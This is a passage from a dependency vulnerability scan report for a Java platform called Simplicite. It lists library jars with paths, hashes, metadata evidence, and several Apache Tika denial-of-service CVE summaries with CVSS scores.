Product pom name stripe-java High Product pom organization name Stripe Low Product pom organization url https://stripe.com Low Product pom url stripe/stripe-java High Version file version 12.0.0 High Version Manifest Bundle-Version 12.0.0 High Version Manifest Implementation-Version 12.0.0 High Version pom version 12.0.0 Highest
sts-2.2.0.jar
Description: jclouds components to access an implementation of Security Token Service (STS)
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/api/sts/2.2.0/sts-2.2.0.jar
MD5: c28fdf7b52053995204ab1073eeffa50
SHA1: dc2f27e3cee17446a905dce8474761a43b3d2561
SHA256: 9e939a535b94290309c9a8d9db76735a6e8cf199df4d5f585654adf2777ca0fa
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sts High Vendor jar package name jclouds Highest Vendor jar package name sts Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname sts Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid sts Highest Vendor pom artifactid sts Low Vendor pom groupid org.apache.jclouds.api Highest Vendor pom name jclouds sts api High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name sts High Product jar package name jclouds Highest Product jar package name sts Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds sts api Medium Product Manifest bundle-symbolicname sts Medium Product Manifest Implementation-Title jclouds sts api High Product Manifest specification-title jclouds jclouds sts api Medium Product pom artifactid sts Highest Product pom groupid org.apache.jclouds.api Highest Product pom name jclouds sts api High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
swagger-annotations-1.5.8.jar
License: http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /var/simplicite/.m2/repository/io/swagger/swagger-annotations/1.5.8/swagger-annotations-1.5.8.jar
MD5: 57370150b5f709d54e96e50162653b51
SHA1: 48d3002e43bde443f19750ec5670d345e9cd8d62
SHA256: a476592aad2355c20559ba323c08fd1d8bf630aab75a8c8ddde22987d65f2d52
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name swagger-annotations High Vendor jar package name annotations Highest Vendor jar package name io Highest Vendor jar package name swagger Highest Vendor Manifest bundle-symbolicname io.swagger.annotations Medium Vendor Manifest mode development Low Vendor Manifest url https://github.com/swagger-api/swagger-core/modules/swagger-annotations Low Vendor pom artifactid swagger-annotations Highest Vendor pom artifactid swagger-annotations Low Vendor pom groupid io.swagger Highest Vendor pom name swagger-annotations High Vendor pom parent-artifactid swagger-project Low Product file name swagger-annotations High Product jar package name annotations Highest Product jar package name api Highest Product jar package name io Highest Product jar package name swagger Highest Product Manifest Bundle-Name swagger-annotations Medium Product Manifest bundle-symbolicname io.swagger.annotations Medium Product Manifest mode development Low Product Manifest url https://github.com/swagger-api/swagger-core/modules/swagger-annotations Low Product pom artifactid swagger-annotations Highest Product pom groupid io.swagger Highest Product pom name swagger-annotations High Product pom parent-artifactid swagger-project Medium Version file version 1.5.8 High Version Manifest Bundle-Version 1.5.8 High Version Manifest implementation-version 1.5.8 High Version pom version 1.5.8 Highest
tagsoup-1.2.1.jar
Description: TagSoup is a SAX-compliant parser written in Java that, instead of parsing well-formed or valid XML, parses HTML as it is found in the wild: poor, nasty and brutish, though quite often far from short. TagSoup is designed for people who have to process this stuff using some semblance of a rational application design. By providing a SAX interface, it allows standard XML tools to be applied to even the worst HTML. TagSoup also includes a command-line processor that reads HTML files and can generate either clean HTML or well-formed XML that is a close approximation to XHTML.
License: Apache License 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/ccil/cowan/tagsoup/tagsoup/1.2.1/tagsoup-1.2.1.jar
MD5: ae73a52cdcbec10cd61d9ef22fab5936
SHA1: 5584627487e984c03456266d3f8802eb85a9ce97
SHA256: ac97f7b4b1d8e9337edfa0e34044f8d0efe7223f6ad8f3a85d54cc1018ea2e04
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name tagsoup High Vendor jar package name ccil Highest Vendor jar package name cowan Highest Vendor jar package name parser Highest Vendor jar package name tagsoup Highest Vendor pom artifactid tagsoup Highest Vendor pom artifactid tagsoup Low Vendor pom developer name John Cowan Medium Vendor pom groupid org.ccil.cowan.tagsoup Highest Vendor pom name TagSoup High Vendor pom url http://home.ccil.org/~cowan/XML/tagsoup/ Highest Product file name tagsoup High Product jar package name ccil Highest Product jar package name cowan Highest Product jar package name parser Highest Product jar package name tagsoup Highest Product pom artifactid tagsoup Highest Product pom developer name John Cowan Low Product pom groupid org.ccil.cowan.tagsoup Highest Product pom name TagSoup High Product pom url http://home.ccil.org/~cowan/XML/tagsoup/ Medium Version file version 1.2.1 High Version Manifest version 1.2.1 Medium Version pom version 1.2.1 Highest
threeten-extra-1.5.0.jar
Description: Additional functionality that enhances JSR-310 dates and times in Java SE 8 and later
License: BSD 3-clause: https://raw.githubusercontent.com/ThreeTen/threeten-extra/master/LICENSE.txt
File Path: /var/simplicite/.m2/repository/org/threeten/threeten-extra/1.5.0/threeten-extra-1.5.0.jar
MD5: 25fcd93381bd0b0d2cf6b99c231e4bb4
SHA1: d6adb54fefe72482ed049f07af31ddf2c287345f
SHA256: e7def554536188fbaf8aac1a0a2f956b039cbbb5696edc3b8336c442c56ae445
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name threeten-extra High Vendor jar package name extra Highest Vendor jar package name threeten Highest Vendor Manifest bundle-docurl https://www.threeten.org Low Vendor Manifest bundle-symbolicname org.threeten.extra Medium Vendor Manifest implementation-url https://www.threeten.org/threeten-extra Low Vendor Manifest Implementation-Vendor ThreeTen.org High Vendor Manifest Implementation-Vendor-Id org.threeten Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor ThreeTen.org Low Vendor pom artifactid threeten-extra Highest Vendor pom artifactid threeten-extra Low Vendor pom developer id jodastephen Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom groupid org.threeten Highest Vendor pom name ThreeTen-Extra High Vendor pom organization name ThreeTen.org High Vendor pom organization url https://www.threeten.org Medium Vendor pom url https://www.threeten.org/threeten-extra Highest Product file name threeten-extra High Product jar package name extra Highest Product jar package name threeten Highest Product Manifest bundle-docurl https://www.threeten.org Low Product Manifest Bundle-Name ThreeTen-Extra Medium Product Manifest bundle-symbolicname org.threeten.extra Medium Product Manifest Implementation-Title ThreeTen-Extra High Product Manifest implementation-url https://www.threeten.org/threeten-extra Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title ThreeTen-Extra Medium Product pom artifactid threeten-extra Highest Product pom developer id jodastephen Low Product pom developer name Stephen Colebourne Low Product pom groupid org.threeten Highest Product pom name ThreeTen-Extra High Product pom organization name ThreeTen.org Low Product pom organization url https://www.threeten.org Low Product pom url https://www.threeten.org/threeten-extra Medium Version file version 1.5.0 High Version Manifest Bundle-Version 1.5.0 High Version Manifest Implementation-Version 1.5.0 High Version pom version 1.5.0 Highest
threetenbp-1.3.3.jar
Description: Backport of JSR-310 from JDK 8 to JDK 7 and JDK 6. NOT an implementation of the JSR.
License: BSD 3-clause: https://raw.githubusercontent.com/ThreeTen/threetenbp/master/LICENSE.txt
File Path: /var/simplicite/.m2/repository/org/threeten/threetenbp/1.3.3/threetenbp-1.3.3.jar
MD5: 6c45c54a06806225d2754b51fbdf088d
SHA1: 3ea31c96676ff12ab56be0b1af6fff61d1a4f1f2
SHA256: 7bbee842b0334f63627556d3c657aab82431f3a207c8dc4dcfc379d7d210a8c6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name threetenbp High Vendor jar package name bp Highest Vendor jar package name threeten Highest Vendor Manifest bundle-docurl http://www.threeten.org Low Vendor Manifest bundle-symbolicname org.threeten.bp Medium Vendor Manifest implementation-url https://www.threeten.org/threetenbp Low Vendor Manifest Implementation-Vendor ThreeTen.org High Vendor Manifest Implementation-Vendor-Id org.threeten Medium Vendor Manifest specification-vendor ThreeTen.org Low Vendor pom artifactid threetenbp Highest Vendor pom artifactid threetenbp Low Vendor pom developer id jodastephen Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom groupid org.threeten Highest Vendor pom name ThreeTen backport High Vendor pom organization name ThreeTen.org High Vendor pom organization url http://www.threeten.org Medium Vendor pom url https://www.threeten.org/threetenbp Highest Product file name threetenbp High Product jar package name bp Highest Product jar package name threeten Highest Product Manifest bundle-docurl http://www.threeten.org Low Product Manifest Bundle-Name ThreeTen backport Medium Product Manifest bundle-symbolicname org.threeten.bp Medium Product Manifest Implementation-Title ThreeTen backport High Product Manifest implementation-url https://www.threeten.org/threetenbp Low Product Manifest specification-title ThreeTen backport Medium Product pom artifactid threetenbp Highest Product pom developer id jodastephen Low Product pom developer name Stephen Colebourne Low Product pom groupid org.threeten Highest Product pom name ThreeTen backport High Product pom organization name ThreeTen.org Low Product pom organization url http://www.threeten.org Low Product pom url https://www.threeten.org/threetenbp Medium Version file version 1.3.3 High Version Manifest Bundle-Version 1.3.3 High Version Manifest Implementation-Version 1.3.3 High Version pom version 1.3.3 Highest
tika-core-1.22.jar
Description: This is the core Apache Tika™ toolkit library from which all other modules inherit functionality. It also includes the core facades for the Tika API.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/tika/tika-core/1.22/tika-core-1.22.jar
MD5: 078d3798a32e444b3e3425457402dce3
SHA1: b193f1f977e64ff77025a4cecd7997cff344c4bc
SHA256: 81a9e28c9fa9d6b00d1e5d85795403fb773d4c571175487b35b83a8c02599dd7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name tika-core High Vendor jar package name apache Highest Vendor jar package name tika Highest Vendor Manifest automatic-module-name org.apache.tika.core Medium Vendor Manifest bundle-activationpolicy lazy Low Vendor Manifest bundle-docurl http://tika.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.tika.core Medium Vendor Manifest implementation-url http://tika.apache.org/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.tika Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid tika-core Highest Vendor pom artifactid tika-core Low Vendor pom groupid org.apache.tika Highest Vendor pom name Apache Tika core High Vendor pom organization name The Apache Software Foundation High Vendor pom organization url http://www.apache.org Medium Vendor pom parent-artifactid tika-parent Low Vendor pom url http://tika.apache.org/ Highest Product file name tika-core High Product jar package name apache Highest Product jar package name tika Highest Product Manifest automatic-module-name org.apache.tika.core Medium Product Manifest bundle-activationpolicy lazy Low Product Manifest bundle-docurl http://tika.apache.org/ Low Product Manifest Bundle-Name Apache Tika core Medium Product Manifest bundle-symbolicname org.apache.tika.core Medium Product Manifest Implementation-Title Apache Tika core High Product Manifest implementation-url http://tika.apache.org/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Tika core Medium Product pom artifactid tika-core Highest Product pom groupid org.apache.tika Highest Product pom name Apache Tika core High Product pom organization name The Apache Software Foundation Low Product pom organization url http://www.apache.org Low Product pom parent-artifactid tika-parent Medium Product pom url http://tika.apache.org/ Medium Version file version 1.22 High Version Manifest Implementation-Version 1.22 High Version pom version 1.22 Highest
CVE-2020-1950
A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser in versions 1.0-1.23.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2020-1951
A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser in versions 1.0-1.23.
CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-28657
A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later.
CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-25169
The BPG parser in versions of Apache Tika before 1.28.2 and 2.4.0 may allocate an unreasonable amount of memory on carefully crafted files.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-30126
In Apache Tika, a regular expression in our StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.2 and 2.4.0
NVD-CWE-Other
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-30973
We failed to apply the fix for CVE-2022-30126 to the 1.x branch in the 1.28.2 release. In Apache Tika, a regular expression in the StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.3.
NVD-CWE-Other
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-33879
The initial fixes in CVE-2022-30126 and CVE-2022-30973 for regexes in the StandardsExtractingContentHandler were insufficient, and we found a separate, new regex DoS in a different regex in the StandardsExtractingContentHandler. These are now fixed in 1.28.4 and 2.4.1.
NVD-CWE-Other
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: LOW (3.3) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
References:
Vulnerable Software & Versions:
tika-parsers-1.22.jar
Description: Apache Tika is a toolkit for detecting and extracting metadata and structured text content from various documents using existing parser libraries.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/tika/tika-parsers/1.22/tika-parsers-1.22.jar
MD5: 688b25cce3d2ba79d4172309ef5a4e58
SHA1: b8a823128f6165882ae41de3ded8655609d62d88
SHA256: 756e77987077cc485763beeac77925001b9b4993e58978be09b8e6c510770aea
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name tika-parsers High Vendor jar package name apache Highest Vendor jar package name tika Highest Vendor Manifest automatic-module-name org.apache.tika.parsers Medium Vendor Manifest bundle-docurl http://tika.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.tika.parsers Medium Vendor Manifest implementation-url http://tika.apache.org/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.tika Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid tika-parsers Highest Vendor pom artifactid tika-parsers Low Vendor pom groupid org.apache.tika Highest Vendor pom name Apache Tika parsers High Vendor pom organization name The Apache Software Foundation High Vendor pom organization url http://www.apache.org Medium Vendor pom parent-artifactid tika-parent Low Vendor pom url http://tika.apache.org/ Highest Product file name tika-parsers High Product jar package name apache Highest Product jar package name parser Highest Product jar package name tika Highest Product Manifest automatic-module-name org.apache.tika.parsers Medium Product Manifest bundle-docurl http://tika.apache.org/ Low Product Manifest Bundle-Name Apache Tika parsers Medium Product Manifest bundle-symbolicname org.apache.tika.parsers Medium Product Manifest Implementation-Title Apache Tika parsers High Product Manifest implementation-url http://tika.apache.org/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Tika parsers Medium Product pom artifactid tika-parsers Highest Product pom groupid org.apache.tika Highest Product pom name Apache Tika parsers High Product pom organization name The Apache Software Foundation Low Product pom organization url http://www.apache.org Low Product pom parent-artifactid tika-parent Medium Product pom url http://tika.apache.org/ Medium Version file version 1.22 High Version Manifest Implementation-Version 1.22 High Version pom version 1.22 Highest
CVE-2020-1950
A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser in versions 1.0-1.23.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2020-1951
A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser in versions 1.0-1.23.
CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2020-9489 (OSSINDEX)
A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The vulnerabilities in the MP4Parser were partially fixed by upgrading the com.googlecode:isoparser:1.1.22 dependency to org.tallison:isoparser:1.9.41.2. For unrelated security reasons, we upgraded org.apache.cxf to 3.3.6 as part of the 1.24.1 release.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2020-9489 for details
CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2: Base Score: MEDIUM (5.5) Vector: /AV:L/AC:L/Au:/C:N/I:N/A:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.apache.tika:tika-parsers:1.22:*:*:*:*:*:*:*
CVE-2021-28657
A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later.
CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-25169
The BPG parser in versions of Apache Tika before 1.28.2 and 2.4.0 may allocate an unreasonable amount of memory on carefully crafted files.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-30126
In Apache Tika, a regular expression in our StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.2 and 2.4.0
NVD-CWE-Other
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-30973
We failed to apply the fix for CVE-2022-30126 to the 1.x branch in the 1.28.2 release. In Apache Tika, a regular expression in the StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.3.
NVD-CWE-Other
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-33879
The initial fixes in CVE-2022-30126 and CVE-2022-30973 for regexes in the StandardsExtractingContentHandler were insufficient, and we found a separate, new regex DoS in a different regex in the StandardsExtractingContentHandler. These are now fixed in 1.28.4 and 2.4.1.
NVD-CWE-Other
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: LOW (3.3) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
References:
Vulnerable Software & Versions:
twilio-7.42.0.jar
Description: Twilio Java Helper Library
License: MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /var/simplicite/.m2/repository/com/twilio/sdk/twilio/7.42.0/twilio-7.42.0.jar
MD5: 5827cc6fb38a4948b41f197bc11d71d9
SHA1: 90428a9e9fc22c3fbe6cb8e5a1d5075df1420607
SHA256: 76add2813e7ebb4a60e11acca594dd2f7e3cb1b076c354456f46a0b0f511bfaf
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name twilio High Vendor jar package name rest Low Vendor jar package name twilio Highest Vendor jar package name twilio Low Vendor pom artifactid twilio Highest Vendor pom artifactid twilio Low Vendor pom developer email api@twilio.com Low Vendor pom developer id api Medium Vendor pom developer name Twilio API Medium Vendor pom developer org Twilio, Inc. Medium Vendor pom developer org URL https://www.twilio.com Medium Vendor pom groupid com.twilio.sdk Highest Vendor pom name twilio High Vendor pom url https://www.twilio.com Highest Product file name twilio High Product jar package name rest Low Product jar package name twilio Highest Product pom artifactid twilio Highest Product pom developer email api@twilio.com Low Product pom developer id api Low Product pom developer name Twilio API Low Product pom developer org Twilio, Inc. Low Product pom developer org URL https://www.twilio.com Low Product pom groupid com.twilio.sdk Highest Product pom name twilio High Product pom url https://www.twilio.com Medium Version file version 7.42.0 High Version pom version 7.42.0 Highest
txw2-2.3.2.jar
Description: TXW is a library that allows you to write XML documents.
File Path: /var/simplicite/.m2/repository/org/glassfish/jaxb/txw2/2.3.2/txw2-2.3.2.jar
MD5: 3f278f148c5d27dc608c25cb7d093b94
SHA1: ce5be7da2e442c25ec14c766cb60cb802741727b
SHA256: 4a6a9f483388d461b81aa9a28c685b8b74c0597993bf1884b04eddbca95f48fe
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name txw2 High Vendor jar package name sun Highest Vendor jar package name txw Highest Vendor jar package name txw2 Highest Vendor jar package name xml Highest Vendor jar (hint) package name oracle Highest Vendor Manifest git-revision ae93d95 Low Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.oracle Medium Vendor Manifest (hint) Implementation-Vendor sun High Vendor pom artifactid txw2 Highest Vendor pom artifactid txw2 Low Vendor pom groupid org.glassfish.jaxb Highest Vendor pom name TXW2 Runtime High Vendor pom parent-artifactid jaxb-txw-parent Low Vendor pom parent-groupid com.sun.xml.bind.mvn Medium Product file name txw2 High Product jar package name sun Highest Product jar package name txw Highest Product jar package name txw2 Highest Product jar package name xml Highest Product Manifest git-revision ae93d95 Low Product Manifest Implementation-Title TXW Runtime High Product Manifest specification-title Java Architecture for XML Binding Medium Product pom artifactid txw2 Highest Product pom groupid org.glassfish.jaxb Highest Product pom name TXW2 Runtime High Product pom parent-artifactid jaxb-txw-parent Medium Product pom parent-groupid com.sun.xml.bind.mvn Medium Version file version 2.3.2 High Version Manifest build-id 2.3.2 Medium Version Manifest Implementation-Version 2.3.2 High Version Manifest major-version 2.3.2 Medium Version pom version 2.3.2 Highest
udunits-4.5.5.jar
Description: The ucar.units Java package is for decoding and encoding formatted unit specifications (e.g. "m/s"), converting numeric values between compatible units (e.g. between "m/s" and "knot"), and for performing arithmetic operations on units (e.g. dividing one unit by another, raising a unit to a power).
File Path: /var/simplicite/.m2/repository/edu/ucar/udunits/4.5.5/udunits-4.5.5.jar
MD5: 025ffadf77de73601443c8262c995df0
SHA1: d8c8d65ade13666eedcf764889c69321c247f153
SHA256: fb641ad901d1526d53f2b13bc86baec703c57d58e6001cfa54ca7734c97fb30d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name udunits High Vendor jar package name ucar Highest Vendor jar package name units Highest Vendor Manifest built-on 20150306.1537 Low Vendor Manifest Implementation-Vendor UCAR/Unidata High Vendor Manifest Implementation-Vendor-Id edu.ucar Medium Vendor pom artifactid udunits Highest Vendor pom artifactid udunits Low Vendor pom developer id emmerson Medium Vendor pom developer name Steve Emmerson Medium Vendor pom groupid edu.ucar Highest Vendor pom name udunits High Vendor pom parent-artifactid thredds-parent Low Vendor pom url http://www.unidata.ucar.edu/software/udunits// Highest Product file name udunits High Product jar package name ucar Highest Product jar package name units Highest Product Manifest built-on 20150306.1537 Low Product Manifest Implementation-Title udunits High Product pom artifactid udunits Highest Product pom developer id emmerson Low Product pom developer name Steve Emmerson Low Product pom groupid edu.ucar Highest Product pom name udunits High Product pom parent-artifactid thredds-parent Medium Product pom url http://www.unidata.ucar.edu/software/udunits// Medium Version file version 4.5.5 High Version Manifest Implementation-Version 4.5.5 High Version pom version 4.5.5 Highest
unit-api-1.0.jar
Description: Units of Measurement Standard - This JSR specifies Java packages for modeling and working with measurement values, quantities and their corresponding units.
License: BSD: LICENSE.txt
File Path: /var/simplicite/.m2/repository/javax/measure/unit-api/1.0/unit-api-1.0.jar
MD5: 0e62b80ee212b7bb9d3cd150ff988a93
SHA1: 6b960260278588d7ff02fe376e5aad39a9c7440b
SHA256: 35da65fdbd3f9c1fe79cfc8399db975fd97660d8a219febfda9fd1a5fc058f10
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name unit-api High Vendor jar package name javax Highest Vendor jar package name measure Highest Vendor jar package name unit Highest Vendor Manifest bundle-docurl http://unitsofmeasurement.github.io Low Vendor Manifest bundle-symbolicname javax.measure.unit-api Medium Vendor Manifest implementation-url http://unitsofmeasurement.github.io Low Vendor Manifest Implementation-Vendor Unit-API contributors High Vendor Manifest Implementation-Vendor-Id javax.measure Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Jean-Marie Dautelle, Werner Keil, V2COM Low Vendor pom artifactid unit-api Highest Vendor pom artifactid unit-api Low Vendor pom developer email christopher.senior@gmail.com Low Vendor pom developer email eralmas7@yahoo.com Low Vendor pom developer email jean-marie@dautelle.com Low Vendor pom developer email karen.legrand@iem.com Low Vendor pom developer email llima@v2com.mobi Low Vendor pom developer email martin.desruisseaux@geomatys.com Low Vendor pom developer email mohamed.taman@gmail.com Low Vendor pom developer email otaviopolianasantana@gmail.com Low Vendor pom developer email rajmahendra@gmail.com Low Vendor pom developer email werner@uom.technology Low Vendor pom developer id dautelle Medium Vendor pom developer id desruisseaux Medium Vendor pom developer id duckasteroid Medium Vendor pom developer id eralmas7 Medium Vendor pom developer id karen_legrand Medium Vendor pom developer id leomrlima Medium Vendor pom developer id mohamed-taman Medium Vendor pom developer id otaviojava Medium Vendor pom developer id rajmahendra Medium Vendor pom developer id werner.keil Medium Vendor pom developer name Almas Shaikh Medium Vendor pom developer name Chris Senior Medium Vendor pom developer name Jean-Marie Dautelle Medium Vendor pom developer name Karen Legrand Medium Vendor pom developer name Leonardo de Moura Rocha Lima Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer name Mohamed Mahmoud Taman Medium Vendor pom developer name Otávio Gonçalves de Santana Medium Vendor pom developer name Rajmahendra Hegde Medium Vendor pom developer name Werner Keil Medium Vendor pom developer org Airbus Medium Vendor pom developer org Creative Arts & Technologies Medium Vendor pom developer org Geomatys Medium Vendor pom developer org Individual / JP Morgan Medium Vendor pom developer org Individual / Morocco JUG Medium Vendor pom developer org Individual / SouJava Medium Vendor pom developer org Innovation Emergency Management (IEM) Medium Vendor pom developer org JUG Chennai Medium Vendor pom developer org Snap-on 